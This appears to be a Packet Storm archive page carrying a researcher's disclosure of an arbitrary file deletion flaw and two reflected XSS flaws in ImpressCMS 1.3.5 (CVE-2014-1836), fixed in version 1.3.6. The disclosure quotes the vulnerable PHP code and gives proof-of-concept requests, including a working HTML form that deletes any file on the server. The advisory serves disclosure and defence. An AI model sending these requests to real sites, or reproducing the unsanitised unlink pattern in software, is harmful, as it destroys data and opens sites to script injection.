Exploit the possiblities

ImpressCMS 1.3.5 XSS / File Deletion

ImpressCMS 1.3.5 XSS / File Deletion
Posted Feb 4, 2014
Authored by Pedro Ribeiro

ImpressCMS version 1.3.5 suffers from arbitrary file deletion and cross site scripting vulnerabilities.

tags | exploit, arbitrary, vulnerability, xss
advisories | CVE-2014-1836
MD5 | 91440de1f233eb770e5ff37684693d46

ImpressCMS 1.3.5 XSS / File Deletion

Change Mirror Download
Hi,

I have discovered two vulnerabilities in ImpressCMS. These have been
fixed in the new 1.3.6 version, which you can get at
https://sourceforge.net/projects/impresscms/files/ImpressCMS%20Official%20Releases/ImpressCMS%201.3%20Branch/ImpressCMS%201.3.6/.

One is an arbitrary file deletion and the other is two cross site
scripting issues.
Note that I was unable to exploit the XSS issues due to the inbuilt
protection module, but someone smarter / with more time might be able
to do it.

The tickets containing the information are available here
https://www.assembla.com/spaces/dW4voyNP0r4ldbeJe5cbLr/tickets?report%5Bestimate_show%5D=true&report%5Bid%5D=0&report%5Bmilestone_id_cond%5D=1&report%5Bmilestone_id_val%5D=4129593&report%5Btitle%5D=All+Tickets+for+%27ImpressCMS+1.3.6%27&report%5Btotal_estimate_show%5D=true&report%5Btotal_invested_hours_show%5D=true&report%5Bworking_hours_show%5D=true.

The full report can be seen at my repo
https://github.com/pedrib/PoC/blob/master/impresscms-1.3.5.txt
Thanks in advance, and thanks to the ImpressCMS team for being so responsive.

Regards,
Pedro Ribeiro
Agile Information Security

--------
Proof of concept:


ImpressCMS 1.3.5 vulnerabilities
===================================
Discovered by
Pedro Ribeiro (pedrib@gmail.com) of Agile Information Security

========================================
Vulnerability: Deletion of arbitrary files in the system
File(line): /impresscms/htdocs/libraries/image-editor/image-edit.php(62)
Code snippet:
if (! is_null ( $op ) && $op == 'cancel') {
$image_path = isset ( $_GET ['image_path'] ) ? $_GET ['image_path'] : null;

if (file_exists ( $image_path )) {
@unlink ( $image_path );
}

Proof of concept:
<form name="input" action="http://192.168.56.101/impresscms/htdocs/libraries/image-editor/image-edit.php?op=cancel&image_path=/path/to/any/file" method="post">
<input type="submit" value="Submit">
</form>


========================================
Vulnerability: Cross site scripting (XSS)
File(line): /impresscms/htdocs/misc.php(110)
Code snippet:
<h4><?php echo _MSC_AVAVATARS;?></h4>
<form name='avatars' action='<?php echo $_SERVER['REQUEST_URI'];?>'>
<table width='100%'>

Proof of concept:
https://192.168.56.101/impresscms/htdocs/misc.php?action=showpopups&type=avatars&target='>PAYLOAD

NOTE: wasn't able to exploit with Protector on, but someone smarter might be able to do it.


========================================
Vulnerability: Cross site scripting (XSS)
File(line): /impresscms/modules/system/admin/tplsets/main.php(171)
Code snippet:
case 'listtpl':
$tplset = trim($_GET['tplset']);
if ($tplset == '') {
redirect_header('admin.php?fct=tplsets', 1);
}
if ($moddir == '') {
redirect_header('admin.php?fct=tplsets', 1);
}
icms_cp_header();
$module_handler = icms::handler('icms_module');
$module =& $module_handler->getByDirname($moddir);
$modname = $module->getVar('name');
echo '<div class="CPbigTitle" style="background-image: url('
. ICMS_MODULES_URL . '/system/admin/tplsets/images/tplsets_big.png)">'
. '<a href="admin.php?fct=tplsets">'. _MD_TPLMAIN
.'</a>&nbsp;<span style="font-weight:bold;">&raquo;&raquo;</span>&nbsp;'
. $tplset . '&nbsp;<span style="font-weight:bold;">&raquo;&raquo;</span>&nbsp;'
. $modname . '<br /><br /></div><br />';

Proof of concept:
https://192.168.56.101/impresscms/htdocs/modules/system/admin.php?fct=tplsets&op=listtpl&tplset=aaaa">PAYLOAD&moddir=banners

NOTE: wasn't able to exploit with Protector on, but someone smarter might be able to do it.



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    0 Files
  • 17
    Jan 17th
    0 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close